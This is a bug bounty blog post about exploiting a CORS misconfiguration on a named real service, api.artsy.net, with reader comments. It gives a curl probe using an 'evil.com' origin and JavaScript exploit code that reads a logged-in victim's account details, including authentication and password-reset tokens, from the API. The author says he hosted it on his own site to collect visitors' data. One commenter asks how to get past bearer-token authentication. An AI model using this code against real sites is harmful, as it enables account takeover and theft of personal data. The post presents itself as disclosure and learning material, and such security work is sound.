Exploiting Insecure Cross Origin Resource Sharing ( CORS ) | api.artsy.net

Exploiting Insecure Cross Origin Resource Sharing – BugBountyPOC

This post is published by Muhammad Khizer Javed as a contributor on BugBountyPOC .Note that the post is written by Muhammad Khizer Javed, & any mistake in writing will be entertained only from him We allow anyone to write contents on our blog as a guest/contributor so other can also learn.If you’re interested in sharing your finding through Bug Bounty POC Platform just signup on blog and you can post freely.

Hello BugBountyPoc viewers, this is Khizer few days a go i was  testing different sites for CORS (Cross Origin Resource Sharing ) issues so that i can see what actually it is as i took about a week to understand it  from different sources and blogs  so i found a website that was vulnerable and I tried to see what i can do with the CORS issue on it,

To test the website for CORS issue i first use CURL,

i.e: curl https://api.artsy.net -H “Origin: https://evil.com” -I

Curl to check CORS

As you can see the response of Curl request include,

Access-Control-Allow-Credentials: true

and

Access-Control-Allow-Origin: https://evil.com

Means that the website is vulnerable to CORS attack, then i followed up with GeekBoy Blog Post as he clearly share the exploit about the CORS issue, I found an API endpoint where i can see the details of user that is logged in,

https://api.artsy.net/api/user_details/

Well i use the exploit code Shared by geekboy to check what if i can export user info on that page that includes,

id,date created,email,birthday,phone,authentication_token,reset_password_token,collections,devices etc

Api disclosing user data

Exploit code:

 

function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById(“demo”).innerHTML =
alert(this.responseText);
}
};
xhttp.open(“GET”, “https://api.artsy.net/api/user_details/<User-ID>”, true);
xhttp.withCredentials = true;
xhttp.send();
}

I uploaded the exploit with my poc on my website

Exploiting Cross Origin Resource Sharing

 

And now if a logged in user use the exploit on my website his account information will be exported to my website

Exploting Insecure CORS

 

Video

 

At the End I would like to Thanks Geekboy & ALL the other blog posts that helped me to understand and exploit this issue successfully

Thanks,

Muhammad Khizer Javed

You may also like...

10 Responses

    • MuhammadKhizerJaved says:

      Well They didn’t give anything as They said its valid and then they said Its a Duplicate for Internal finding So i thought I should share it with u guys

      • Ravi says:

        Many companies saying its duplicate or not valid donno whether they are fixing silently or not serious about the security

  1. Anas Roubi says:

    Very nice bro keep it up

  2. Duc Nguyen says:

    Hi Muhammad,

    I was checked this exploit on my target, but it’s doesn’t work with Authorization header bearer.

    So do you know how we bypass this ? (withCredential was set true)

  3. Ranjana says:

    How to remediate this issue

  4. Yusuf says:

    Amazing PoC Bro…

  1. August 4, 2017

    […] Day Initiative — Pythonizing the VMware Backdoor. Revoke obfuscation report. Exploiting Cross Origin Resource Sharing. Exploiting Insecure Cross Origin Resource Sharing – BugBountyPOC This post is published by […]

  2. April 26, 2019

    […] Exploiting Misconfigured CORS (Cross Origin Resource Sharing) Exploiting Insecure Cross Origin Resource Sharing ( CORS ) | api.artsy.net […]

Leave a Reply

Your email address will not be published. Required fields are marked *